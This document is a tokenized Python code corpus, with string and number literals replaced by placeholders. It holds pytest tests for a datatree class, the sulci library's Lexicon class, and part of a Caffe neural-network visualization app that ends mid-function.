"<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> def test_create_node_with_existing_node ( self ) : <EOL> self . test_dt . create_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> pytest . raises ( datatree . 
NodeExistsException , <EOL> self . test_dt . create_node , "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> def test_delete_node ( self ) : <EOL> self . test_dt . create_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> self . test_dt . create_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> self . test_dt . create_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> children = self . test_dt . get_children ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> children . sort ( ) <EOL> assert [ "<STR_LIT:b>" , "<STR_LIT:c>" ] == children <EOL> self . test_dt . delete_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> assert [ "<STR_LIT:b>" ] == self . test_dt . get_children ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> self . test_dt . delete_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> assert [ ] == self . test_dt . get_children ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> self . test_dt . delete_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> assert [ ] == self . test_dt . get_children ( "<STR_LIT:/>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> def test_delete_node_with_nonexistent_node ( self ) : <EOL> pytest . raises ( datatree . NoNodeException , self . test_dt . delete_node , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> pytest . raises ( datatree . NoNodeException , self . test_dt . delete_node , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> pytest . raises ( datatree . NoNodeException , self . test_dt . delete_node , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> def test_delete_node_with_children ( self ) : <EOL> self . test_dt . create_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> self . test_dt . 
create_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> self . test_dt . create_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> pytest . raises ( datatree . NotEmptyException , self . test_dt . delete_node , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> def test_get_children ( self ) : <EOL> self . test_dt . create_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> self . test_dt . create_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> children = self . test_dt . get_children ( "<STR_LIT:/>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> children . sort ( ) <EOL> assert [ "<STR_LIT:a>" , "<STR_LIT:b>" ] == children <EOL> pytest . raises ( datatree . NoNodeException , self . test_dt . get_children , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> pytest . raises ( datatree . NoNodeException , self . test_dt . get_children , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> def test_get_set_data ( self ) : <EOL> self . test_dt . create_node ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> assert ( str ( "<STR_LIT>" ) == <EOL> self . test_dt . get_data ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) ) <EOL> self . test_dt . set_data ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> assert ( str ( "<STR_LIT>" ) == <EOL> self . test_dt . get_data ( "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) ) <EOL> def test_get_set_data_with_nonexistent_node ( self ) : <EOL> pytest . raises ( datatree . NoNodeException , self . test_dt . set_data , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> pytest . raises ( datatree . NoNodeException , self . test_dt . get_data , <EOL> "<STR_LIT>" . 
encode ( "<STR_LIT:utf8>" ) ) <EOL> pytest . raises ( datatree . NoNodeException , self . test_dt . set_data , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> pytest . raises ( datatree . NoNodeException , self . test_dt . get_data , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> pytest . raises ( datatree . NoNodeException , self . test_dt . set_data , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) , "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) <EOL> pytest . raises ( datatree . NoNodeException , self . test_dt . get_data , <EOL> "<STR_LIT>" . encode ( "<STR_LIT:utf8>" ) ) </s>
<s> """<STR_LIT>""" <EOL> from collections import defaultdict <EOL> from operator import itemgetter <EOL> from base import TextManager <EOL> from utils import load_file , save_to_file <EOL> from sulci . log import sulci_logger <EOL> from corpus import Corpus <EOL> class Lexicon ( TextManager ) : <EOL> """<STR_LIT>""" <EOL> _loaded = { } <EOL> def __init__ ( self , path = "<STR_LIT>" ) : <EOL> self . CORPUS_EXT = "<STR_LIT>" <EOL> self . VALID_EXT = "<STR_LIT>" <EOL> self . PENDING_EXT = "<STR_LIT>" <EOL> self . PATH = path <EOL> self . _raw_content = "<STR_LIT>" <EOL> self . _prefixes = None <EOL> self . _suffixes = None <EOL> self . factors = set ( ) <EOL> def __iter__ ( self ) : <EOL> return self . loaded . __iter__ ( ) <EOL> def __getitem__ ( self , item ) : <EOL> return self . loaded . __getitem__ ( item ) <EOL> def __len__ ( self ) : <EOL> return len ( self . loaded ) <EOL> def items ( self ) : <EOL> return self . loaded . items ( ) <EOL> def __contains__ ( self , key ) : <EOL> if isinstance ( key , object ) and key . __class__ . __name__ == "<STR_LIT>" : <EOL> key = key . original <EOL> return key in self . loaded <EOL> @ property <EOL> def loaded ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . PATH in self . _loaded : <EOL> sulci_logger . debug ( "<STR_LIT>" , "<STR_LIT>" , True ) <EOL> lx = load_file ( "<STR_LIT>" % self . PATH ) <EOL> self . _loaded [ self . PATH ] = { } <EOL> for line in lx . split ( "<STR_LIT:\n>" ) : <EOL> if line : <EOL> lexicon_entity = LexiconEntity ( line ) <EOL> self . add_factors ( lexicon_entity . word ) <EOL> self . _loaded [ self . PATH ] [ lexicon_entity . word ] = lexicon_entity <EOL> return self . _loaded [ self . PATH ] <EOL> def add_factors ( self , token ) : <EOL> """<STR_LIT>""" <EOL> prefix = token <EOL> while prefix : <EOL> suffix = prefix <EOL> while suffix : <EOL> if not suffix == token : <EOL> self . factors . 
add ( suffix ) <EOL> suffix = suffix [ <NUM_LIT:1> : ] <EOL> prefix = prefix [ : - <NUM_LIT:1> ] <EOL> def make ( self , force = False ) : <EOL> """<STR_LIT>""" <EOL> final = { } <EOL> lemme_to_original = { } <EOL> C = Corpus ( self . CORPUS_EXT ) <EOL> for tk in C . tokens : <EOL> if tk . verified_tag [ : <NUM_LIT:3> ] == "<STR_LIT>" : <EOL> continue <EOL> if not tk . original in final : <EOL> final [ tk . original ] = defaultdict ( int ) <EOL> final [ tk . original ] [ tk . verified_tag ] += <NUM_LIT:1> <EOL> if not tk . original in lemme_to_original : <EOL> lemme_to_original [ tk . original ] = { } <EOL> if not tk . verified_tag in lemme_to_original [ tk . original ] : <EOL> lemme_to_original [ tk . original ] [ tk . verified_tag ] = defaultdict ( int ) <EOL> lemme_to_original [ tk . original ] [ tk . verified_tag ] [ tk . verified_lemme ] += <NUM_LIT:1> <EOL> def get_one_line ( key ) : <EOL> """<STR_LIT>""" <EOL> return u"<STR_LIT>" % ( key , get_tags ( key ) ) <EOL> def get_tags ( key ) : <EOL> """<STR_LIT>""" <EOL> tags = sorted ( [ ( k , v ) for k , v in final [ key ] . iteritems ( ) ] , <EOL> key = itemgetter ( <NUM_LIT:1> ) , reverse = True ) <EOL> final_data = [ ] <EOL> for tag , score in tags : <EOL> computed_lemmes = get_lemmes ( key , tag ) <EOL> lemme , score = computed_lemmes [ <NUM_LIT:0> ] <EOL> final_data . append ( u"<STR_LIT>" % ( tag , lemme ) ) <EOL> return u"<STR_LIT:U+0020>" . join ( final_data ) <EOL> def get_lemmes ( key , tag ) : <EOL> """<STR_LIT>""" <EOL> return sorted ( ( ( k , v ) for k , v in lemme_to_original [ key ] [ tag ] . iteritems ( ) ) , <EOL> key = itemgetter ( <NUM_LIT:1> ) , reverse = True ) <EOL> d = [ ] <EOL> for k , v in sorted ( final . iteritems ( ) ) : <EOL> d . append ( get_one_line ( k ) ) <EOL> final_d = u"<STR_LIT:\n>" . join ( d ) <EOL> ext = force and self . VALID_EXT or self . PENDING_EXT <EOL> save_to_file ( "<STR_LIT>" % ( self . 
PATH , ext ) , unicode ( final_d ) ) <EOL> def create_afixes ( self ) : <EOL> """<STR_LIT>""" <EOL> prefixes = defaultdict ( int ) <EOL> suffixes = defaultdict ( int ) <EOL> max_prefix_length = <NUM_LIT:3> <EOL> max_suffix_length = <NUM_LIT:5> <EOL> for tokenstring , _ in self . items ( ) : <EOL> tlen = len ( tokenstring ) <EOL> for i in xrange ( <NUM_LIT:1> , min ( max_prefix_length + <NUM_LIT:1> , tlen ) ) : <EOL> prefix = tokenstring [ <NUM_LIT:0> : i ] <EOL> prefixes [ prefix ] += len ( prefix ) <EOL> for i in xrange ( <NUM_LIT:1> , min ( max_suffix_length + <NUM_LIT:1> , tlen ) ) : <EOL> suffix = tokenstring [ tlen - i : tlen ] <EOL> suffixes [ suffix ] += len ( suffix ) <EOL> self . _prefixes = set ( key for key , value in sorted ( ( ( k , v ) for k , v in prefixes . items ( ) if v > len ( k ) * <NUM_LIT:2> ) , <EOL> key = itemgetter ( <NUM_LIT:1> ) , reverse = True ) ) <EOL> self . _suffixes = set ( key for key , value in sorted ( ( ( k , v ) for k , v in suffixes . items ( ) if v > len ( k ) * <NUM_LIT:2> ) , <EOL> key = itemgetter ( <NUM_LIT:1> ) , reverse = True ) ) <EOL> @ property <EOL> def prefixes ( self ) : <EOL> if self . _prefixes is None : <EOL> self . create_afixes ( ) <EOL> return self . _prefixes <EOL> @ property <EOL> def suffixes ( self ) : <EOL> if self . _suffixes is None : <EOL> self . create_afixes ( ) <EOL> return self . _suffixes <EOL> def get_entry ( self , entry ) : <EOL> if entry in self : <EOL> sulci_logger . info ( unicode ( self [ entry ] ) , "<STR_LIT>" ) <EOL> else : <EOL> sulci_logger . info ( u'<STR_LIT>' % entry , "<STR_LIT>" ) <EOL> def check ( self ) : <EOL> """<STR_LIT>""" <EOL> for key , entity in self . items ( ) : <EOL> if len ( entity . tags ) > <NUM_LIT:1> : <EOL> sulci_logger . info ( u"<STR_LIT>" % ( len ( entity . tags ) , key ) , "<STR_LIT>" ) <EOL> sulci_logger . info ( entity . 
tags , "<STR_LIT>" ) <EOL> class LexiconEntity ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , raw_data , ** kwargs ) : <EOL> self . default_tag = None <EOL> self . default_lemme = None <EOL> self . word , tags = raw_data . split ( "<STR_LIT:\t>" ) <EOL> self . tags = dict ( ) <EOL> tags = tags . split ( ) <EOL> for one_tag in tags : <EOL> tag , lemme = one_tag . split ( "<STR_LIT:/>" ) <EOL> if self . default_tag is None : <EOL> self . default_tag = tag <EOL> if self . default_lemme is None : <EOL> self . default_lemme = lemme <EOL> self . tags [ tag ] = lemme <EOL> def __unicode__ ( self ) : <EOL> return u"<STR_LIT>" % ( self . word , self . tags ) <EOL> def __contains__ ( self , key ) : <EOL> return self . tags . __contains__ ( key ) <EOL> def __getitem__ ( self , key ) : <EOL> return self . tags [ key ] </s>
<s> import sys <EOL> import os <EOL> import cv2 <EOL> import numpy as np <EOL> import time <EOL> import StringIO <EOL> from misc import WithTimer <EOL> from numpy_cache import FIFOLimitedArrayCache <EOL> from app_base import BaseApp <EOL> from image_misc import norm01 , norm01c , norm0255 , tile_images_normalize , ensure_float01 , tile_images_make_tiles , ensure_uint255_and_resize_to_fit , get_tiles_height_width , get_tiles_height_width_ratio <EOL> from image_misc import FormattedString , cv2_typeset_text , to_255 <EOL> from caffe_proc_thread import CaffeProcThread <EOL> from jpg_vis_loading_thread import JPGVisLoadingThread <EOL> from caffevis_app_state import CaffeVisAppState <EOL> from caffevis_helper import get_pretty_layer_name , read_label_file , load_sprite_image , load_square_sprite_image , check_force_backward_true <EOL> class CaffeVisApp ( BaseApp ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , settings , key_bindings ) : <EOL> super ( CaffeVisApp , self ) . __init__ ( settings , key_bindings ) <EOL> print '<STR_LIT>' , settings <EOL> self . settings = settings <EOL> self . bindings = key_bindings <EOL> self . _net_channel_swap = ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> self . _net_channel_swap_inv = tuple ( [ self . _net_channel_swap . index ( ii ) for ii in range ( len ( self . _net_channel_swap ) ) ] ) <EOL> self . _range_scale = <NUM_LIT:1.0> <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . join ( settings . caffevis_caffe_root , '<STR_LIT>' ) ) <EOL> import caffe <EOL> if settings . caffevis_mode_gpu : <EOL> caffe . set_mode_gpu ( ) <EOL> print '<STR_LIT>' <EOL> else : <EOL> caffe . set_mode_cpu ( ) <EOL> print '<STR_LIT>' <EOL> self . net = caffe . Classifier ( <EOL> settings . caffevis_deploy_prototxt , <EOL> settings . caffevis_network_weights , <EOL> mean = None , <EOL> channel_swap = self . _net_channel_swap , <EOL> raw_scale = self . _range_scale , <EOL> ) <EOL> if isinstance ( settings . 
caffevis_data_mean , basestring ) : <EOL> try : <EOL> self . _data_mean = np . load ( settings . caffevis_data_mean ) <EOL> except IOError : <EOL> print '<STR_LIT>' , settings . caffevis_data_mean <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> raise <EOL> input_shape = self . net . blobs [ self . net . inputs [ <NUM_LIT:0> ] ] . data . shape [ - <NUM_LIT:2> : ] <EOL> excess_h = self . _data_mean . shape [ <NUM_LIT:1> ] - input_shape [ <NUM_LIT:0> ] <EOL> excess_w = self . _data_mean . shape [ <NUM_LIT:2> ] - input_shape [ <NUM_LIT:1> ] <EOL> assert excess_h >= <NUM_LIT:0> and excess_w >= <NUM_LIT:0> , '<STR_LIT>' % repr ( input_shape ) <EOL> self . _data_mean = self . _data_mean [ : , ( excess_h / <NUM_LIT:2> ) : ( excess_h / <NUM_LIT:2> + input_shape [ <NUM_LIT:0> ] ) , <EOL> ( excess_w / <NUM_LIT:2> ) : ( excess_w / <NUM_LIT:2> + input_shape [ <NUM_LIT:1> ] ) ] <EOL> elif settings . caffevis_data_mean is None : <EOL> self . _data_mean = None <EOL> else : <EOL> self . _data_mean = np . array ( settings . caffevis_data_mean ) <EOL> while len ( self . _data_mean . shape ) < <NUM_LIT:1> : <EOL> self . _data_mean = np . expand_dims ( self . _data_mean , - <NUM_LIT:1> ) <EOL> if self . _data_mean is not None : <EOL> self . net . transformer . set_mean ( self . net . inputs [ <NUM_LIT:0> ] , self . _data_mean ) <EOL> check_force_backward_true ( settings . caffevis_deploy_prototxt ) <EOL> self . labels = None <EOL> if self . settings . caffevis_labels : <EOL> self . labels = read_label_file ( self . settings . caffevis_labels ) <EOL> self . proc_thread = None <EOL> self . jpgvis_thread = None <EOL> self . handled_frames = <NUM_LIT:0> <EOL> if settings . caffevis_jpg_cache_size < <NUM_LIT:10> * <NUM_LIT> ** <NUM_LIT:2> : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> self . img_cache = FIFOLimitedArrayCache ( settings . caffevis_jpg_cache_size ) <EOL> self . 
_populate_net_layer_info ( ) <EOL> def _populate_net_layer_info ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . net_layer_info = { } <EOL> for key in self . net . blobs . keys ( ) : <EOL> self . net_layer_info [ key ] = { } <EOL> blob_shape = self . net . blobs [ key ] . data . shape <EOL> assert len ( blob_shape ) in ( <NUM_LIT:2> , <NUM_LIT:4> ) , '<STR_LIT>' <EOL> self . net_layer_info [ key ] [ '<STR_LIT>' ] = ( len ( blob_shape ) == <NUM_LIT:4> ) <EOL> self . net_layer_info [ key ] [ '<STR_LIT>' ] = blob_shape [ <NUM_LIT:1> : ] <EOL> self . net_layer_info [ key ] [ '<STR_LIT>' ] = blob_shape [ <NUM_LIT:1> ] <EOL> self . net_layer_info [ key ] [ '<STR_LIT>' ] = get_tiles_height_width_ratio ( blob_shape [ <NUM_LIT:1> ] , self . settings . caffevis_layers_aspect_ratio ) <EOL> self . net_layer_info [ key ] [ '<STR_LIT>' ] = self . net_layer_info [ key ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> self . net_layer_info [ key ] [ '<STR_LIT>' ] = self . net_layer_info [ key ] [ '<STR_LIT>' ] [ <NUM_LIT:1> ] <EOL> def start ( self ) : <EOL> self . state = CaffeVisAppState ( self . net , self . settings , self . bindings , self . net_layer_info ) <EOL> self . state . drawing_stale = True <EOL> self . layer_print_names = [ get_pretty_layer_name ( self . settings , nn ) for nn in self . state . _layers ] <EOL> if self . proc_thread is None or not self . proc_thread . is_alive ( ) : <EOL> self . proc_thread = CaffeProcThread ( self . net , self . state , <EOL> self . settings . caffevis_frame_wait_sleep , <EOL> self . settings . caffevis_pause_after_keys , <EOL> self . settings . caffevis_heartbeat_required , <EOL> self . settings . caffevis_mode_gpu ) <EOL> self . proc_thread . start ( ) <EOL> if self . jpgvis_thread is None or not self . jpgvis_thread . is_alive ( ) : <EOL> self . jpgvis_thread = JPGVisLoadingThread ( self . settings , self . state , self . img_cache , <EOL> self . settings . caffevis_jpg_load_sleep , <EOL> self . settings . 
caffevis_heartbeat_required ) <EOL> self . jpgvis_thread . start ( ) <EOL> def get_heartbeats ( self ) : <EOL> return [ self . proc_thread . heartbeat , self . jpgvis_thread . heartbeat ] <EOL> def quit ( self ) : <EOL> print '<STR_LIT>' <EOL> with self . state . lock : <EOL> self . state . quit = True <EOL> if self . proc_thread != None : <EOL> for ii in range ( <NUM_LIT:3> ) : <EOL> self . proc_thread . join ( <NUM_LIT:1> ) <EOL> if not self . proc_thread . is_alive ( ) : <EOL> break <EOL> if self . proc_thread . is_alive ( ) : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> self . proc_thread = None <EOL> print '<STR_LIT>' <EOL> def _can_skip_all ( self , panes ) : <EOL> return ( '<STR_LIT>' not in panes . keys ( ) ) <EOL> def handle_input ( self , input_image , panes ) : <EOL> if self . debug_level > <NUM_LIT:1> : <EOL> print '<STR_LIT>' , self . handled_frames , '<STR_LIT>' , '<STR_LIT:None>' if input_image is None else '<STR_LIT>' <EOL> self . handled_frames += <NUM_LIT:1> <EOL> if self . _can_skip_all ( panes ) : <EOL> return <EOL> with self . state . lock : <EOL> if self . debug_level > <NUM_LIT:1> : <EOL> print '<STR_LIT>' <EOL> self . state . next_frame = input_image <EOL> if self . debug_level > <NUM_LIT:1> : <EOL> print '<STR_LIT>' , self . state . caffe_net_state <EOL> def redraw_needed ( self ) : <EOL> return self . state . redraw_needed ( ) <EOL> def draw ( self , panes ) : <EOL> if self . _can_skip_all ( panes ) : <EOL> if self . debug_level > <NUM_LIT:1> : <EOL> print '<STR_LIT>' <EOL> return False <EOL> with self . state . lock : <EOL> do_draw = self . state . drawing_stale and self . state . caffe_net_state == '<STR_LIT>' <EOL> if do_draw : <EOL> self . state . caffe_net_state = '<STR_LIT>' <EOL> if do_draw : <EOL> if self . debug_level > <NUM_LIT:1> : <EOL> print '<STR_LIT>' <EOL> if '<STR_LIT>' in panes : <EOL> self . _draw_control_pane ( panes [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' in panes : <EOL> self . 
_draw_status_pane ( panes [ '<STR_LIT>' ] ) <EOL> layer_data_3D_highres = None <EOL> if '<STR_LIT>' in panes : <EOL> layer_data_3D_highres = self . _draw_layer_pane ( panes [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' in panes : <EOL> self . _draw_aux_pane ( panes [ '<STR_LIT>' ] , layer_data_3D_highres ) <EOL> if '<STR_LIT>' in panes : <EOL> self . _draw_back_pane ( panes [ '<STR_LIT>' ] ) <EOL> if self . state . layers_pane_zoom_mode == <NUM_LIT:2> : <EOL> self . _draw_back_pane ( panes [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' in panes : <EOL> self . _draw_jpgvis_pane ( panes [ '<STR_LIT>' ] ) <EOL> with self . state . lock : <EOL> self . state . drawing_stale = False <EOL> self . state . caffe_net_state = '<STR_LIT>' <EOL> return do_draw <EOL> def _draw_prob_labels_pane ( self , pane ) : <EOL> '''<STR_LIT>''' <EOL> if not self . labels or not self . state . show_label_predictions or not self . settings . caffevis_prob_layer : <EOL> return <EOL> defaults = { '<STR_LIT>' : getattr ( cv2 , self . settings . caffevis_class_face ) , <EOL> '<STR_LIT>' : self . settings . caffevis_class_fsize , <EOL> '<STR_LIT>' : to_255 ( self . settings . caffevis_class_clr_0 ) , <EOL> '<STR_LIT>' : self . settings . caffevis_class_thick } <EOL> loc = self . settings . caffevis_class_loc [ : : - <NUM_LIT:1> ] <EOL> clr_0 = to_255 ( self . settings . caffevis_class_clr_0 ) <EOL> clr_1 = to_255 ( self . settings . caffevis_class_clr_1 ) <EOL> probs_flat = self . net . blobs [ self . settings . caffevis_prob_layer ] . data . flatten ( ) <EOL> top_5 = probs_flat . argsort ( ) [ - <NUM_LIT:1> : - <NUM_LIT:6> : - <NUM_LIT:1> ] <EOL> strings = [ ] <EOL> pmax = probs_flat [ top_5 [ <NUM_LIT:0> ] ] <EOL> for idx in top_5 : <EOL> prob = probs_flat [ idx ] <EOL> text = '<STR_LIT>' % ( prob , self . labels [ idx ] ) <EOL> fs = FormattedString ( text , defaults ) <EOL> fs . 
clr = tuple ( [ max ( <NUM_LIT:0> , min ( <NUM_LIT:255> , clr_1 [ ii ] * prob + clr_0 [ ii ] * ( <NUM_LIT:1> - prob ) ) ) for ii in range ( <NUM_LIT:3> ) ] ) <EOL> strings . append ( [ fs ] ) <EOL> cv2_typeset_text ( pane . data , strings , loc , <EOL> line_spacing = self . settings . caffevis_class_line_spacing ) <EOL> def _draw_control_pane ( self , pane ) : <EOL> pane . data [ : ] = to_255 ( self . settings . window_background ) <EOL> with self . state . lock : <EOL> layer_idx = self . state . layer_idx <EOL> loc = self . settings . caffevis_control_loc [ : : - <NUM_LIT:1> ] <EOL> strings = [ ] <EOL> defaults = { '<STR_LIT>' : getattr ( cv2 , self . settings . caffevis_control_face ) , <EOL> '<STR_LIT>' : self . settings . caffevis_control_fsize , <EOL> '<STR_LIT>' : to_255 ( self . settings . caffevis_control_clr ) , <EOL> '<STR_LIT>' : self . settings . caffevis_control_thick } <EOL> for ii in range ( len ( self . layer_print_names ) ) : <EOL> fs = FormattedString ( self . layer_print_names [ ii ] , defaults ) <EOL> this_layer = self . state . _layers [ ii ] <EOL> if self . state . backprop_selection_frozen and this_layer == self . state . backprop_layer : <EOL> fs . clr = to_255 ( self . settings . caffevis_control_clr_bp ) <EOL> fs . thick = self . settings . caffevis_control_thick_bp <EOL> if this_layer == self . state . layer : <EOL> if self . state . cursor_area == '<STR_LIT>' : <EOL> fs . clr = to_255 ( self . settings . caffevis_control_clr_cursor ) <EOL> fs . thick = self . settings . caffevis_control_thick_cursor <EOL> else : <EOL> if not ( self . state . backprop_selection_frozen and this_layer == self . state . backprop_layer ) : <EOL> fs . clr = to_255 ( self . settings . caffevis_control_clr_selected ) <EOL> fs . thick = self . settings . caffevis_control_thick_selected <EOL> strings . append ( fs ) <EOL> cv2_typeset_text ( pane . data , strings , loc , <EOL> line_spacing = self . settings . 
caffevis_control_line_spacing , <EOL> wrap = True ) <EOL> def _draw_status_pane ( self , pane ) : <EOL> pane . data [ : ] = to_255 ( self . settings . window_background ) <EOL> defaults = { '<STR_LIT>' : getattr ( cv2 , self . settings . caffevis_status_face ) , <EOL> '<STR_LIT>' : self . settings . caffevis_status_fsize , <EOL> '<STR_LIT>' : to_255 ( self . settings . caffevis_status_clr ) , <EOL> '<STR_LIT>' : self . settings . caffevis_status_thick } <EOL> loc = self . settings . caffevis_status_loc [ : : - <NUM_LIT:1> ] <EOL> status = StringIO . StringIO ( ) <EOL> fps = self . proc_thread . approx_fps ( ) <EOL> with self . state . lock : <EOL> print >> status , '<STR_LIT>' if self . state . pattern_mode else ( '<STR_LIT>' if self . state . layers_show_back else '<STR_LIT>' ) , <EOL> print >> status , '<STR_LIT>' % ( self . state . layer , self . state . selected_unit ) , <EOL> if not self . state . back_enabled : <EOL> print >> status , '<STR_LIT>' , <EOL> else : <EOL> print >> status , '<STR_LIT>' % ( '<STR_LIT>' if self . state . back_mode == '<STR_LIT>' else '<STR_LIT>' ) , <EOL> print >> status , '<STR_LIT>' % ( self . state . backprop_layer , <EOL> self . state . backprop_unit , <EOL> self . state . back_filt_mode ) , <EOL> print >> status , '<STR_LIT:|>' , <EOL> print >> status , '<STR_LIT>' % ( self . state . layer_boost_indiv , self . state . layer_boost_gamma ) <EOL> if fps > <NUM_LIT:0> : <EOL> print >> status , '<STR_LIT>' % fps <EOL> if self . state . extra_msg : <EOL> print >> status , '<STR_LIT:|>' , self . state . extra_msg <EOL> self . state . extra_msg = '<STR_LIT>' <EOL> strings = [ FormattedString ( line , defaults ) for line in status . getvalue ( ) . split ( '<STR_LIT:\n>' ) ] <EOL> cv2_typeset_text ( pane . data , strings , loc , <EOL> line_spacing = self . settings . caffevis_status_line_spacing ) <EOL> def _draw_layer_pane ( self , pane ) : <EOL> '''<STR_LIT>''' <EOL> if self . state . layers_show_back : <EOL> layer_dat_3D = self . net . 
blobs [ self . state . layer ] . diff [ <NUM_LIT:0> ] <EOL> else : <EOL> layer_dat_3D = self . net . blobs [ self . state . layer ] . data [ <NUM_LIT:0> ] <EOL> if len ( layer_dat_3D . shape ) == <NUM_LIT:1> : <EOL> layer_dat_3D = layer_dat_3D [ : , np . newaxis , np . newaxis ] <EOL> n_tiles = layer_dat_3D . shape [ <NUM_LIT:0> ] <EOL> tile_rows , tile_cols = self . net_layer_info [ self . state . layer ] [ '<STR_LIT>' ] <EOL> display_3D_highres = None <EOL> if self . state . pattern_mode : <EOL> load_layer = self . state . layer <EOL> if self . settings . caffevis_jpgvis_remap and self . state . layer in self . settings . caffevis_jpgvis_remap : <EOL> load_layer = self . settings . caffevis_jpgvis_remap [ self . state . layer ] <EOL> if self . settings . caffevis_jpgvis_layers and load_layer in self . settings . caffevis_jpgvis_layers : <EOL> jpg_path = os . path . join ( self . settings . caffevis_unit_jpg_dir , <EOL> '<STR_LIT>' , load_layer , '<STR_LIT>' ) <EOL> display_3D_highres = self . img_cache . get ( ( jpg_path , '<STR_LIT>' ) , None ) <EOL> if display_3D_highres is None : <EOL> try : <EOL> with WithTimer ( '<STR_LIT>' , quiet = self . debug_level < <NUM_LIT:1> ) : <EOL> display_3D_highres = load_square_sprite_image ( jpg_path , n_sprites = n_tiles ) <EOL> except IOError : <EOL> pass <EOL> else : <EOL> self . img_cache . set ( ( jpg_path , '<STR_LIT>' ) , display_3D_highres ) <EOL> if display_3D_highres is not None : <EOL> row_downsamp_factor = int ( np . ceil ( float ( display_3D_highres . shape [ <NUM_LIT:1> ] ) / ( pane . data . shape [ <NUM_LIT:0> ] / tile_rows - <NUM_LIT:2> ) ) ) <EOL> col_downsamp_factor = int ( np . ceil ( float ( display_3D_highres . shape [ <NUM_LIT:2> ] ) / ( pane . data . 
shape [ <NUM_LIT:1> ] / tile_cols - <NUM_LIT:2> ) ) ) <EOL> ds = max ( row_downsamp_factor , col_downsamp_factor ) <EOL> if ds > <NUM_LIT:1> : <EOL> display_3D = display_3D_highres [ : , : : ds , : : ds , : ] <EOL> else : <EOL> display_3D = display_3D_highres <EOL> else : <EOL> display_3D = layer_dat_3D * <NUM_LIT:0> <EOL> else : <EOL> if self . state . layers_show_back : <EOL> back_what_to_disp = self . get_back_what_to_disp ( ) <EOL> if back_what_to_disp == '<STR_LIT>' : <EOL> layer_dat_3D_normalized = np . tile ( self . settings . window_background , layer_dat_3D . shape + ( <NUM_LIT:1> , ) ) <EOL> elif back_what_to_disp == '<STR_LIT>' : <EOL> layer_dat_3D_normalized = np . tile ( self . settings . stale_background , layer_dat_3D . shape + ( <NUM_LIT:1> , ) ) <EOL> else : <EOL> layer_dat_3D_normalized = tile_images_normalize ( layer_dat_3D , <EOL> boost_indiv = self . state . layer_boost_indiv , <EOL> 